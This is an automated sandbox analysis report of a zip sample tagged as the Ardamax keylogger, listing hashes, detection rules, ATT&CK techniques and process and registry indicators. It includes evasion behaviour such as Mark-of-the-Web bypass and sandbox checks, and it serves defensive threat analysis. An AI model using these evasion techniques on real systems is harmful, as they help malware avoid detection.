ardamax | c0f7c3f593d8b31e0c6fac845ae5829c13e170c22bda05b1863dc6b7bb8801ba

Analysis

max time kernel
1199s
max time network
1212s
platform
windows11-21h2_x64
resource
win11-20241023-en
resource tags

arch:x64arch:x86image:win11-20241023-enlocale:en-usos:windows11-21h2-x64system
submitted
04/12/2024, 09:57 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Obekräftade 231649.zip
Size

277.7MB
MD5

6319a740e05748ddf05a7a122fc42e66
SHA1

680db1ddc43500a991f4ef32563c275a69bb8c57
SHA256

c0f7c3f593d8b31e0c6fac845ae5829c13e170c22bda05b1863dc6b7bb8801ba
SHA512

03c5f14aa35b60ba8b82a0c8987d2ca773ad1064fab7b800160b2a72aa6a9b78674fbe29a97f7dc063d6b76c09c2a43e08ca2dd31a6dd947ed6d0592fa83be33
SSDEEP

6291456:7G5AfA8/dSjOnRcHFjajD9eEHJ1P0CmqDJLEzCRn/OZ5ed:7Pd/PRcH1g9eEYPwloCRn/OZ5ed

Score

10^/10

ardamax agilenet defense_evasion discovery evasion keylogger phishing stealer trojan upx

Malware Config

Signatures

Ardamax
A keylogger first seen in 2013.
keylogger stealer ardamax
Ardamax family
ardamax

Ardamax main executable 6 IoCs

resource	yara_rule
behavioral1/files/0x00010000000259c7-356.dat	family_ardamax
behavioral1/files/0x00050000000259ee-362.dat	family_ardamax
behavioral1/files/0x001d00000002aba0-367.dat	family_ardamax
behavioral1/files/0x00010000000259ce-357.dat	family_ardamax
behavioral1/files/0x001900000002aaad-370.dat	family_ardamax
behavioral1/files/0x001900000002ab6c-402.dat	family_ardamax

Downloads MZ/PE file
A potential corporate email address has been identified in the URL: get-connected@3x.png
phishing
A potential corporate email address has been identified in the URL: stay-safe@3x.png
phishing
A potential corporate email address has been identified in the URL: tb85@2x.png
phishing
A potential corporate email address has been identified in the URL: tor-logo@2x.png
phishing

Executes dropped EXE 43 IoCs

pid	Process
5024	build.exe
4120	build.exe
2120	tor-browser-windows-x86_64-portable-14.0.3.exe
1364	firefox.exe
3508	firefox.exe
2192	firefox.exe
2640	firefox.exe
2444	firefox.exe
5016	tor.exe
5280	firefox.exe
5752	firefox.exe
4228	firefox.exe
5780	firefox.exe
5916	firefox.exe
2644	firefox.exe
5680	firefox.exe
5376	firefox.exe
5624	firefox.exe
4948	firefox.exe
5208	firefox.exe
1424	firefox.exe
6788	firefox.exe
6816	firefox.exe
6844	firefox.exe
6872	firefox.exe
6904	firefox.exe
7380	firefox.exe
7352	firefox.exe
7324	firefox.exe
8112	firefox.exe
8140	firefox.exe
8168	firefox.exe
6500	firefox.exe
6852	firefox.exe
7320	firefox.exe
7912	firefox.exe
8216	firefox.exe
8920	firefox.exe
7076	firefox.exe
8028	firefox.exe
6716	firefox.exe
6960	firefox.exe
8748	firefox.exe

Loads dropped DLL 64 IoCs

pid	Process
2120	setup.exe
2120	setup.exe
2120	setup.exe
2120	tor-browser-windows-x86_64-portable-14.0.3.exe
2120	tor-browser-windows-x86_64-portable-14.0.3.exe
2120	tor-browser-windows-x86_64-portable-14.0.3.exe
1364	firefox.exe
3508	firefox.exe
3508	firefox.exe
3508	firefox.exe
3508	firefox.exe
3508	firefox.exe
3508	firefox.exe
3508	firefox.exe
3508	firefox.exe
3508	firefox.exe
3508	firefox.exe
3508	firefox.exe
3508	firefox.exe
3508	firefox.exe
2192	firefox.exe
2192	firefox.exe
2192	firefox.exe
2192	firefox.exe
2192	firefox.exe
2640	firefox.exe
2640	firefox.exe
2640	firefox.exe
2640	firefox.exe
2640	firefox.exe
2444	firefox.exe
2444	firefox.exe
2444	firefox.exe
2444	firefox.exe
2444	firefox.exe
5280	firefox.exe
5280	firefox.exe
5280	firefox.exe
5280	firefox.exe
5280	firefox.exe
5752	firefox.exe
5752	firefox.exe
5752	firefox.exe
5752	firefox.exe
5752	firefox.exe
2444	firefox.exe
5752	firefox.exe
5752	firefox.exe
2444	firefox.exe
4228	firefox.exe
4228	firefox.exe
4228	firefox.exe
4228	firefox.exe
4228	firefox.exe
4228	firefox.exe
4228	firefox.exe
5280	firefox.exe
5280	firefox.exe
5780	firefox.exe
5780	firefox.exe
5780	firefox.exe
5780	firefox.exe
5780	firefox.exe
5916	firefox.exe

Obfuscated with Agile.Net obfuscator 1 IoCs

Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

agilenet

resource	yara_rule
behavioral1/memory/1372-329-0x0000000000B20000-0x0000000000C4A000-memory.dmp	agile_net

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	firefox.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/4804-1320-0x0000000000400000-0x0000000000494000-memory.dmp	upx
behavioral1/memory/4804-1323-0x0000000000400000-0x0000000000494000-memory.dmp	upx

Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 1 IoCs

When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.

defense_evasion

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\tor-browser-windows-x86_64-portable-14.0.3.exe:Zone.Identifier	msedge.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Agent Tesla.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	builder.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	build.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	build.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	setup.exe

Checks processor information in registry 2 TTPs 13 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	Winword.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	Winword.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Winword.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe

Enumerates system info in registry 2 TTPs 18 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	Winword.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	Winword.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	Winword.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Modifies Internet Explorer settings 1 TTPs 29 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionLow = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Internet Explorer\GPU\VendorId = "4318"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Internet Explorer\GPU\DeviceId = "140"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Internet Explorer\VersionManager	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionHigh = "268435456"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize = "1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPMigrationVer = "1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListXMLVersionHigh = "268435456"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListDomainAttributeSet = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\StaleCompatCache = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListXMLVersionLow = "395196024"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "13"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Internet Explorer\VersionManager\FirstCheckForUpdateHighDateTime = "31147621"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Internet Explorer\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\HomepagesUpgradeVersion = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Internet Explorer\BrowserEmulation	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionHigh = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Internet Explorer\GPU\SoftwareFallback = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Internet Explorer\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "8"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "9"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Internet Explorer\GPU\SubSysId = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Internet Explorer\GPU\Revision = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionLow = "395196024"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Internet Explorer\VersionManager\FirstCheckForUpdateLowDateTime = "2103860317"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\StaleCompatCache = "0"	iexplore.exe

Modifies registry class 17 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\.ini	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\䗡쀀	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ini_auto_file\shell	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ini_auto_file\shell\edit\command\ = "\"C:\\Program Files\\Microsoft Office\\root\\Office16\\Winword.exe\" /n \"%1\""	OpenWith.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-4248760313-3670024077-2384670640-1000\{7AE2362B-A235-4559-935D-1937C444306F}	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ini_auto_file\shell\edit\command	OpenWith.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	tor-browser-windows-x86_64-portable-14.0.3.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\.ini\ = "ini_auto_file"	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\䗡쀀\ = "ini_auto_file"	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ini_auto_file\shell\edit\ = "@C:\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\Office16\\oregres.dll,-1"	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ini_auto_file	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ini_auto_file\shell\edit	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings	OpenWith.exe

NTFS ADS 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 285421.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\tor-browser-windows-x86_64-portable-14.0.3.exe:Zone.Identifier	msedge.exe

Opens file in notepad (likely ransom note) 2 IoCs

ransomware

pid	Process
3908	NOTEPAD.EXE
1308	NOTEPAD.EXE

Suspicious behavior: AddClipboardFormatListener 3 IoCs

pid	Process
976	Winword.exe
976	Winword.exe
3920	vlc.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
5016	msedge.exe
5016	msedge.exe
2376	msedge.exe
2376	msedge.exe
2744	identity_helper.exe
2744	identity_helper.exe
3544	msedge.exe
3544	msedge.exe
1372	Agent Tesla.exe
1372	Agent Tesla.exe
1372	Agent Tesla.exe
1372	Agent Tesla.exe
1372	Agent Tesla.exe
1372	Agent Tesla.exe
1372	Agent Tesla.exe
1372	Agent Tesla.exe
1372	Agent Tesla.exe
1372	Agent Tesla.exe
1372	Agent Tesla.exe
1372	Agent Tesla.exe
1372	Agent Tesla.exe
1372	Agent Tesla.exe
1372	Agent Tesla.exe
1372	Agent Tesla.exe
1372	Agent Tesla.exe
1372	Agent Tesla.exe
1372	Agent Tesla.exe
1372	Agent Tesla.exe
1372	Agent Tesla.exe
1372	Agent Tesla.exe
1372	Agent Tesla.exe
1372	Agent Tesla.exe
1372	Agent Tesla.exe
1372	Agent Tesla.exe
1372	Agent Tesla.exe
1372	Agent Tesla.exe
1372	Agent Tesla.exe
1372	Agent Tesla.exe
1372	Agent Tesla.exe
2240	msedge.exe
2240	msedge.exe
672	msedge.exe
672	msedge.exe
1372	Agent Tesla.exe
1372	Agent Tesla.exe
1372	Agent Tesla.exe
1372	Agent Tesla.exe
1372	Agent Tesla.exe
1372	Agent Tesla.exe
1372	Agent Tesla.exe
1372	Agent Tesla.exe
1372	Agent Tesla.exe
1372	Agent Tesla.exe
3488	identity_helper.exe
3488	identity_helper.exe
1372	Agent Tesla.exe
3004	msedge.exe
1372	Agent Tesla.exe
3004	msedge.exe
1372	Agent Tesla.exe
1372	Agent Tesla.exe
1372	Agent Tesla.exe
1372	Agent Tesla.exe
1372	Agent Tesla.exe

Suspicious behavior: GetForegroundWindowSpam 3 IoCs

pid	Process
1308	OpenWith.exe
4484	OpenWith.exe
3920	vlc.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 46 IoCs

pid	Process
2376	msedge.exe
2376	msedge.exe
2376	msedge.exe
2376	msedge.exe
2376	msedge.exe
2376	msedge.exe
672	msedge.exe
672	msedge.exe
672	msedge.exe
672	msedge.exe
672	msedge.exe
672	msedge.exe
672	msedge.exe
672	msedge.exe
672	msedge.exe
672	msedge.exe
1036	msedge.exe
1036	msedge.exe
3924	msedge.exe
3924	msedge.exe
3924	msedge.exe
3924	msedge.exe
3484	msedge.exe
3484	msedge.exe
3484	msedge.exe
3484	msedge.exe
3484	msedge.exe
3484	msedge.exe
3484	msedge.exe
3484	msedge.exe
3484	msedge.exe
3484	msedge.exe
3484	msedge.exe
3484	msedge.exe
3484	msedge.exe
3484	msedge.exe
3484	msedge.exe
3484	msedge.exe
3484	msedge.exe
3484	msedge.exe
3484	msedge.exe
3484	msedge.exe
3484	msedge.exe
3484	msedge.exe
3484	msedge.exe
3484	msedge.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

description	pid	Process
Token: SeRestorePrivilege	3716	7zFM.exe
Token: 35	3716	7zFM.exe
Token: SeSecurityPrivilege	3716	7zFM.exe
Token: SeDebugPrivilege	1372	Agent Tesla.exe
Token: 33	1372	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	1372	AUDIODG.EXE
Token: 33	3920	vlc.exe
Token: SeIncBasePriorityPrivilege	3920	vlc.exe
Token: SeDebugPrivilege	3508	firefox.exe
Token: SeDebugPrivilege	3508	firefox.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
3716	7zFM.exe
3716	7zFM.exe
2376	msedge.exe
2376	msedge.exe
2376	msedge.exe
2376	msedge.exe
2376	msedge.exe
2376	msedge.exe
2376	msedge.exe
2376	msedge.exe
2376	msedge.exe
2376	msedge.exe
2376	msedge.exe
2376	msedge.exe
2376	msedge.exe
2376	msedge.exe
2376	msedge.exe
2376	msedge.exe
2376	msedge.exe
2376	msedge.exe
2376	msedge.exe
2376	msedge.exe
2376	msedge.exe
2376	msedge.exe
2376	msedge.exe
2376	msedge.exe
2376	msedge.exe
2376	msedge.exe
672	msedge.exe
672	msedge.exe
672	msedge.exe
672	msedge.exe
672	msedge.exe
672	msedge.exe
672	msedge.exe
672	msedge.exe
672	msedge.exe
672	msedge.exe
672	msedge.exe
672	msedge.exe
672	msedge.exe
672	msedge.exe
672	msedge.exe
672	msedge.exe
672	msedge.exe
672	msedge.exe
672	msedge.exe
672	msedge.exe
672	msedge.exe
672	msedge.exe
672	msedge.exe
672	msedge.exe
672	msedge.exe
672	msedge.exe
1036	msedge.exe
1036	msedge.exe
1036	msedge.exe
1036	msedge.exe
1036	msedge.exe
1036	msedge.exe
1036	msedge.exe
1036	msedge.exe
1036	msedge.exe
1036	msedge.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
2376	msedge.exe
2376	msedge.exe
2376	msedge.exe
2376	msedge.exe
2376	msedge.exe
2376	msedge.exe
2376	msedge.exe
2376	msedge.exe
2376	msedge.exe
2376	msedge.exe
2376	msedge.exe
2376	msedge.exe
672	msedge.exe
672	msedge.exe
672	msedge.exe
672	msedge.exe
672	msedge.exe
672	msedge.exe
672	msedge.exe
672	msedge.exe
672	msedge.exe
672	msedge.exe
672	msedge.exe
672	msedge.exe
1036	msedge.exe
1036	msedge.exe
1036	msedge.exe
1036	msedge.exe
1036	msedge.exe
1036	msedge.exe
1036	msedge.exe
1036	msedge.exe
1036	msedge.exe
1036	msedge.exe
1036	msedge.exe
1036	msedge.exe
3924	msedge.exe
3924	msedge.exe
3924	msedge.exe
3924	msedge.exe
3924	msedge.exe
3924	msedge.exe
3924	msedge.exe
3924	msedge.exe
3924	msedge.exe
3924	msedge.exe
3924	msedge.exe
3924	msedge.exe
3920	vlc.exe
3920	vlc.exe
3920	vlc.exe
3920	vlc.exe
3920	vlc.exe
3920	vlc.exe
3920	vlc.exe
3920	vlc.exe
3920	vlc.exe
3484	msedge.exe
3484	msedge.exe
3484	msedge.exe
3484	msedge.exe
3484	msedge.exe
3484	msedge.exe
3484	msedge.exe

Suspicious use of SetWindowsHookEx 51 IoCs

pid	Process
1308	OpenWith.exe
1308	OpenWith.exe
1308	OpenWith.exe
1308	OpenWith.exe
1308	OpenWith.exe
1308	OpenWith.exe
1308	OpenWith.exe
1308	OpenWith.exe
1308	OpenWith.exe
1308	OpenWith.exe
1308	OpenWith.exe
2588	OpenWith.exe
4484	OpenWith.exe
4484	OpenWith.exe
4484	OpenWith.exe
4484	OpenWith.exe
4484	OpenWith.exe
4484	OpenWith.exe
4484	OpenWith.exe
4484	OpenWith.exe
4484	OpenWith.exe
4484	OpenWith.exe
4484	OpenWith.exe
4484	OpenWith.exe
4484	OpenWith.exe
4484	OpenWith.exe
4484	OpenWith.exe
4484	OpenWith.exe
4484	OpenWith.exe
4484	OpenWith.exe
4484	OpenWith.exe
976	Winword.exe
976	Winword.exe
976	Winword.exe
976	Winword.exe
976	Winword.exe
976	Winword.exe
976	Winword.exe
976	Winword.exe
4952	OpenWith.exe
3920	vlc.exe
3920	vlc.exe
3920	vlc.exe
3920	vlc.exe
3508	firefox.exe
3508	firefox.exe
3508	firefox.exe
3508	firefox.exe
3508	firefox.exe
3508	firefox.exe
3508	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2120 wrote to memory of 2376	2120	setup.exe	87
PID 2120 wrote to memory of 2376	2120	setup.exe	87
PID 2376 wrote to memory of 1568	2376	msedge.exe	88
PID 2376 wrote to memory of 1568	2376	msedge.exe	88
PID 2376 wrote to memory of 1708	2376	msedge.exe	89
PID 2376 wrote to memory of 1708	2376	msedge.exe	89
PID 2376 wrote to memory of 1708	2376	msedge.exe	89
PID 2376 wrote to memory of 1708	2376	msedge.exe	89
PID 2376 wrote to memory of 1708	2376	msedge.exe	89
PID 2376 wrote to memory of 1708	2376	msedge.exe	89
PID 2376 wrote to memory of 1708	2376	msedge.exe	89
PID 2376 wrote to memory of 1708	2376	msedge.exe	89
PID 2376 wrote to memory of 1708	2376	msedge.exe	89
PID 2376 wrote to memory of 1708	2376	msedge.exe	89
PID 2376 wrote to memory of 1708	2376	msedge.exe	89
PID 2376 wrote to memory of 1708	2376	msedge.exe	89
PID 2376 wrote to memory of 1708	2376	msedge.exe	89
PID 2376 wrote to memory of 1708	2376	msedge.exe	89
PID 2376 wrote to memory of 1708	2376	msedge.exe	89
PID 2376 wrote to memory of 1708	2376	msedge.exe	89
PID 2376 wrote to memory of 1708	2376	msedge.exe	89
PID 2376 wrote to memory of 1708	2376	msedge.exe	89
PID 2376 wrote to memory of 1708	2376	msedge.exe	89
PID 2376 wrote to memory of 1708	2376	msedge.exe	89
PID 2376 wrote to memory of 1708	2376	msedge.exe	89
PID 2376 wrote to memory of 1708	2376	msedge.exe	89
PID 2376 wrote to memory of 1708	2376	msedge.exe	89
PID 2376 wrote to memory of 1708	2376	msedge.exe	89
PID 2376 wrote to memory of 1708	2376	msedge.exe	89
PID 2376 wrote to memory of 1708	2376	msedge.exe	89
PID 2376 wrote to memory of 1708	2376	msedge.exe	89
PID 2376 wrote to memory of 1708	2376	msedge.exe	89
PID 2376 wrote to memory of 1708	2376	msedge.exe	89
PID 2376 wrote to memory of 1708	2376	msedge.exe	89
PID 2376 wrote to memory of 1708	2376	msedge.exe	89
PID 2376 wrote to memory of 1708	2376	msedge.exe	89
PID 2376 wrote to memory of 1708	2376	msedge.exe	89
PID 2376 wrote to memory of 1708	2376	msedge.exe	89
PID 2376 wrote to memory of 1708	2376	msedge.exe	89
PID 2376 wrote to memory of 1708	2376	msedge.exe	89
PID 2376 wrote to memory of 1708	2376	msedge.exe	89
PID 2376 wrote to memory of 1708	2376	msedge.exe	89
PID 2376 wrote to memory of 1708	2376	msedge.exe	89
PID 2376 wrote to memory of 1708	2376	msedge.exe	89
PID 2376 wrote to memory of 5016	2376	msedge.exe	90
PID 2376 wrote to memory of 5016	2376	msedge.exe	90
PID 2376 wrote to memory of 1044	2376	msedge.exe	92
PID 2376 wrote to memory of 1044	2376	msedge.exe	92
PID 2376 wrote to memory of 1044	2376	msedge.exe	92
PID 2376 wrote to memory of 1044	2376	msedge.exe	92
PID 2376 wrote to memory of 1044	2376	msedge.exe	92
PID 2376 wrote to memory of 1044	2376	msedge.exe	92
PID 2376 wrote to memory of 1044	2376	msedge.exe	92
PID 2376 wrote to memory of 1044	2376	msedge.exe	92
PID 2376 wrote to memory of 1044	2376	msedge.exe	92
PID 2376 wrote to memory of 1044	2376	msedge.exe	92
PID 2376 wrote to memory of 1044	2376	msedge.exe	92
PID 2376 wrote to memory of 1044	2376	msedge.exe	92
PID 2376 wrote to memory of 1044	2376	msedge.exe	92
PID 2376 wrote to memory of 1044	2376	msedge.exe	92
PID 2376 wrote to memory of 1044	2376	msedge.exe	92
PID 2376 wrote to memory of 1044	2376	msedge.exe	92
PID 2376 wrote to memory of 1044	2376	msedge.exe	92
PID 2376 wrote to memory of 1044	2376	msedge.exe	92

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\Obekräftade 231649.zip"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3716

C:\Windows\System32\rundll32.exe
